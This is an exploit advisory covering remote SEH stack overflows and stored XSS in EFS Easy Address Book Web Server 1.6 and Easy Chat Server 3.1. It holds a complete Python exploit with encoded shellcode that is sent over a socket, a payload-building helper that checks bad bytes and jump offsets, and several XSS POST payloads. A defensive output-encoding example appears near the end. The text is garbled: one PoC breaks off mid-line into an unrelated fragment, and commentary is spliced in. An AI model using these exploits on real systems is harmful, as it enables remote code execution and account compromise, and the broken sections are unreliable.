# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on: Windows 7, 10

# CVE-2023-4491:

Vulnerability Type: searchbook Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119

Vulnerability description:

There is a remote stack-based buffer overflow (SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6. By sending an overly long string in the name field of a POST request to /searchbook.ghp, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket
import struct

def sendbuff():
    # > arwin.exe kernel32.dll WinExec
    # WinExec is located at 0x776f2c91 in kernel32.dll (address is specific to the tested system)
    shellcode_WinExec = (
        "\x33\xc0"              # XOR EAX,EAX
        "\x50"                  # PUSH EAX => padding / NULL terminator for lpCmdLine
        "\x68\x2E\x65\x78\x65"  # PUSH ".exe"
        "\x68\x63\x61\x6C\x63"  # PUSH "calc"
        "\x8B\xC4"              # MOV EAX,ESP        (EAX -> "calc.exe")
        "\x6A\x01"              # PUSH 1             (uCmdShow = SW_SHOWNORMAL)
        "\x50"                  # PUSH EAX           (lpCmdLine)
        "\xBB\x91\x2c\x6f\x77"  # MOV EBX,kernel32.WinExec
        "\xFF\xD3")             # CALL EBX

    shellcode_system = (
        "\x31\xC9"              # xor ecx,ecx
        "\x51"                  # push ecx           (NULL terminator)
        "\x68\x63\x61\x6C\x63"  # push 0x636c6163    ("calc")
        "\x54"                  # push dword ptr esp (pointer to "calc")
        "\xB8\x6f\xb1\xdc\x75"  # mov eax,msvcrt.system
        "\xFF\xD0")             # call eax

    shellcode = shellcode_WinExec

    # SEH
    junk1 = "A"*455
    buffer = junk1
    buffer += "\xeb\x10\x90\x90"  # nSEH: jmp 0x10 to nops to shellcode
    buffer += struct.pack('

# CVE-2023-4492:

demo1 demo1 demo1@demo1.com demo1, , , , USA Edit Delete

# CVE-2023-4493:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Easy Address Book Web Server v1.6 does not sufficiently encode user-controlled input, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /users_admin.ghp (POST method, authenticated Admin user) in multiple parameters.

Proof of concept:

Example 1:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update

Vulnerable parameter: email

Response:
"> Delete
Example 2:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=Update

Vulnerable parameter: username

Response:
"> Delete
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on: Windows 7, 10

# CVE-2023-4494:

Vulnerability Type: register Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119

Vulnerability description:

There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long string in the username parameter of a GET request to register.ghp, an attacker may be able to execute arbitrary code.
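The following helper is an added example, not code from the advisory or the vendor. It builds the SEH overwrite layout that both overflow PoCs on this page rely on (filler up to the nSEH slot, a short jmp in nSEH, a pop/pop/ret address in SEH, then the shellcode) and checks the three things that most often break such a payload before it is sent: bad bytes in the gadget address or shellcode, a short jmp whose displacement does not land inside the shellcode, and a payload longer than the overflow delivers. The offsets and gadget are the ones from the register.ghp PoC below (473 bytes, 0x10010E1E in SSLEAY32.DLL, jmp +6, 600 bytes total); the shellcode is a constructed breakpoint sled of the same length as the encoded calc payload, and the request wrapper and host value are illustrative.

```python
import struct

# Layout constants copied from the Easy Chat Server register.ghp PoC below.
TOTAL_LEN = 600                 # total length of the username value
SEH_OFFSET = 473                # filler bytes before the nSEH field
POP_POP_RET = 0x10010E1E        # pop/pop/ret gadget in SSLEAY32.DLL
NSEH = b"\xeb\x06\x90\x90"      # short jmp +6, skipping over the SEH address
BAD_CHARS = b"\x00\x20"         # bytes msfencode was told to avoid in the PoC

# Constructed placeholder for the 101-byte encoded calc shellcode:
# an int3 sled of the same length, NOT the PoC's real payload.
SHELLCODE = b"\xcc" * 101


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return (offset, byte) pairs in data that the transport would mangle."""
    return [(i, b) for i, b in enumerate(data) if b in bad_chars]


def short_jmp_target(nseh, nseh_offset):
    """Resolve where a 2-byte short jmp (EB rel8) placed in nSEH lands.

    rel8 is signed and relative to the end of the 2-byte instruction, so the
    landing offset inside the buffer is nseh_offset + 2 + rel8.
    """
    if nseh[0] != 0xEB:
        raise ValueError("nSEH does not start with a short jmp (EB rel8)")
    rel8 = nseh[1] - 256 if nseh[1] > 0x7F else nseh[1]
    return nseh_offset + 2 + rel8


def build_seh_buffer(shellcode=SHELLCODE, seh_offset=SEH_OFFSET,
                     seh_addr=POP_POP_RET, nseh=NSEH, total_len=TOTAL_LEN,
                     bad_chars=BAD_CHARS):
    """Assemble filler | nSEH | SEH | shellcode | padding and sanity-check it.

    Raises ValueError for a bad byte in nSEH, the SEH address or the shellcode,
    for a short jmp that does not land inside the shellcode, and for a payload
    that does not fit in total_len.
    """
    seh_bytes = struct.pack("<I", seh_addr)   # little-endian, as in the PoC
    for name, blob in (("nSEH", nseh), ("SEH", seh_bytes), ("shellcode", shellcode)):
        hits = find_bad_chars(blob, bad_chars)
        if hits:
            raise ValueError("%s contains bad bytes at %r" % (name, hits))

    shellcode_start = seh_offset + len(nseh) + len(seh_bytes)
    landing = short_jmp_target(nseh, seh_offset)
    if not shellcode_start <= landing < shellcode_start + len(shellcode):
        raise ValueError("short jmp lands at %d, outside shellcode [%d, %d)"
                         % (landing, shellcode_start, shellcode_start + len(shellcode)))

    used = shellcode_start + len(shellcode)
    if used > total_len:
        raise ValueError("payload needs %d bytes but only %d are sent" % (used, total_len))

    buf = b"A" * seh_offset + nseh + seh_bytes + shellcode + b"D" * (total_len - used)
    assert len(buf) == total_len
    return buf


def describe_layout(buf, seh_offset=SEH_OFFSET, shellcode_len=len(SHELLCODE)):
    """Report the offsets a debugger (e.g. !mona findmsp) should confirm."""
    return {
        "nseh_offset": seh_offset,
        "seh_offset": seh_offset + 4,
        "seh_value": struct.unpack("<I", buf[seh_offset + 4:seh_offset + 8])[0],
        "landing": short_jmp_target(buf[seh_offset:seh_offset + 4], seh_offset),
        "shellcode_start": seh_offset + 8,
        "shellcode_end": seh_offset + 8 + shellcode_len,
    }


def build_register_request(host, payload):
    """Wrap the payload in a GET /register.ghp request like the PoC's (illustrative)."""
    return (b"GET /register.ghp?username=" + payload + b"&password= HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n"
            b"Connection: close\r\n\r\n")


if __name__ == "__main__":
    buf = build_seh_buffer()
    print(describe_layout(buf))
    print(len(build_register_request("192.168.X.X", buf)))   # placeholder host
```

The bad-byte check matters here because the payload travels inside a URL query string: the gadget address 0x10010E1E packs to 1e 0e 01 10, which contains neither 0x00 nor 0x20, while an address such as 0x10010020 would be rejected. The landing check encodes the arithmetic behind "\xeb\x06": the jmp at offset 473 ends at 475, and 475 + 6 = 481 is exactly where the shellcode starts after the 4-byte SEH address.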
Proof of concept:

#!/usr/bin/env python2
import socket

def sendbuff():
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    shellcode = (
        "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
        "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
        "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
        "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
        "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
        "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
        "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
        "\x1c\x39\xbd"
    )

    # SEH
    junk1 = "A"*473
    buffer = junk1
    buffer += "\xeb\x06\x90\x90"  # nSEH: short jmp +6 over the SEH address to the shellcode
    buffer += "\x1e\x0e\x01\x10"  # SEH: pop/pop/ret @ 0x10010E1E in SSLEAY32.DLL, from !mona
    buffer += shellcode
    junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)  # pad the value to 600 bytes
    buffer += junk2
    return buffer

def REQ_GET(padding):
    GET = (
        "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
        "Host: " + str(ip) + ":80\r\n"
        "Accept-Language: es-es\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://" + str(ip) + "\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    )
    return GET

ip = '192.168.X.X'  # change the ip address
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_GET(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sent GET, length " + str(len(payload))
except socket.error:
    print "Connection error"

# CVE-2023-4495:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Easy Chat Server v3.1 does not sufficiently encode user-controlled input, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /registresult.htm (POST method) in the Resume parameter. The XSS is loaded from /register.ghp.

Proof of concept:

POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username= &password=
Upgrade-Insecure-Requests: 1
Host: localhost

UserName=&Password=&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:
Congratulations! Your information has been changed successfully.
Go to: http://localhost/register.ghp?username=&password=

Response - xss:

Your profile/interests:
# CVE-2023-4496:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Easy Chat Server v3.1 does not sufficiently encode user-controlled input, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /body2.ghp (POST method) in the mtowho parameter.

Proof of concept:

POST http://localhost/body2.ghp?username=&password=&room=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username= &password=&room=4
Upgrade-Insecure-Requests: 1
Host: localhost

staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=

# CVE-2023-4497:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #3
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Easy Chat Server v3.1 does not sufficiently encode user-controlled input, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /registresult.htm (POST method) in the Icon parameter. The XSS is loaded from /users.ghp.

Proof of concept:

POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username= &password=
Upgrade-Insecure-Requests: 1

UserName=&Password=&Password1=&Sex=0&Email=%252525252540.com&Icon=">

Response:
Congratulations! Your information has been changed successfully.
When the user information page loads: http://localhost/users.ghp?username=&password=&room=4

[vip room]
[Online users:1]
[All]
[]<==
[Change infomation]
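The stored XSS findings on this page share one root cause: user input is written into HTML in three different contexts (an attribute value for email, username and Icon, the textarea body for Resume, and, judging by the shape of the mtowho payload, an inline script) with no context-specific encoding. The following added example is not code from the advisory or the vendor: it uses a hypothetical page builder standing in for the .ghp templates (an assumption, since the real templates are not shown), renders the URL-decoded PoC payloads through both a raw-concatenation version and an encoded version, and then runs each page through Python's HTML tokenizer to show what comes back out as data. The point a simple html.escape() misses is the script context, where the HTML tokenizer ends the element at the first "</script" before any JavaScript runs, so "</" must be broken up as well.

```python
import html
import json
from html.parser import HTMLParser

# Payloads from the PoCs above, URL-decoded (constructed test input).
ATTR_PAYLOAD = '"><script>alert(1);</script>'
TEXTAREA_PAYLOAD = '</TEXTAREA><script>alert(1)</script><TEXTAREA>'
SCRIPT_PAYLOAD = '</script><script>alert(1);</script><script>'


def render_vulnerable(email, resume, towho):
    """Hypothetical page builder that concatenates raw input (assumed, not vendor code)."""
    return (f'<input name="email" value="{email}">\n'
            f'<textarea name="Resume">{resume}</textarea>\n'
            f'<script>var towho = "{towho}";</script>')


def js_string_literal(value):
    """Encode a value as a JS string literal safe inside an inline <script>."""
    # json.dumps escapes quotes and control characters, but leaves "</" alone;
    # the HTML tokenizer would end the element at "</script" before JS runs.
    return json.dumps(value).replace("</", "<\\/")


def render_fixed(email, resume, towho):
    """Same page with encoding chosen per output context."""
    return (f'<input name="email" value="{html.escape(email, quote=True)}">\n'
            f'<textarea name="Resume">{html.escape(resume, quote=False)}</textarea>\n'
            f'<script>var towho = {js_string_literal(towho)};</script>')


class Collector(HTMLParser):
    """Records what an HTML tokenizer makes of the page: the input's value
    attribute, the textarea text, and the bodies of all <script> elements."""

    def __init__(self):
        super().__init__()
        self.email = None
        self.textarea = ""
        self.scripts = []
        self._in = None

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.email = dict(attrs).get("value")
        elif tag in ("textarea", "script"):
            self._in = tag
            if tag == "script":
                self.scripts.append("")

    def handle_data(self, data):
        if self._in == "textarea":
            self.textarea += data
        elif self._in == "script":
            self.scripts[-1] += data

    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None


def round_trip(page):
    """Parse the page and report what survived as data in each context.

    towho is recovered only if exactly one script element exists and its body
    is still the single assignment we emitted; otherwise the injection broke
    the script element apart and towho is None.
    """
    c = Collector()
    c.feed(page)
    c.close()
    towho = None
    if len(c.scripts) == 1:
        body = c.scripts[0].strip()
        prefix, suffix = "var towho = ", ";"
        if body.startswith(prefix) and body.endswith(suffix):
            towho = json.loads(body[len(prefix):-len(suffix)])
    return {"email": c.email, "resume": c.textarea,
            "towho": towho, "script_elements": len(c.scripts)}


if __name__ == "__main__":
    args = (ATTR_PAYLOAD, TEXTAREA_PAYLOAD, SCRIPT_PAYLOAD)
    print("vulnerable:", round_trip(render_vulnerable(*args)))
    print("fixed:     ", round_trip(render_fixed(*args)))
```

In the vulnerable rendering the tokenizer sees an empty value attribute, an empty textarea and five script elements, three of them carrying alert(1); in the encoded rendering every payload comes back unchanged as data and there is exactly one script element, whose JSON-encoded string decodes to the original mtowho value.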